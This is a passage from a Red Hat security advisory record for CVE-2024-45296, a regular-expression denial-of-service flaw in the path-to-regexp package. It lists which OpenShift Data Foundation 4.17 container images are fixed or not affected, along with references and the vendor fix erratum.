"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310908", }, ], notes: [ { category: "description", text: "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", title: "Vulnerability description", }, { category: "summary", text: "path-to-regexp: Backtracking regular expressions cause ReDoS", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45296", }, { category: "external", summary: "RHBZ#2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45296", url: "https://www.cve.org/CVERecord?id=CVE-2024-45296", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", url: "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", url: "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", }, { category: "external", summary: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", url: "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", }, ], release_date: "2024-09-09T19:15:13.330000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", 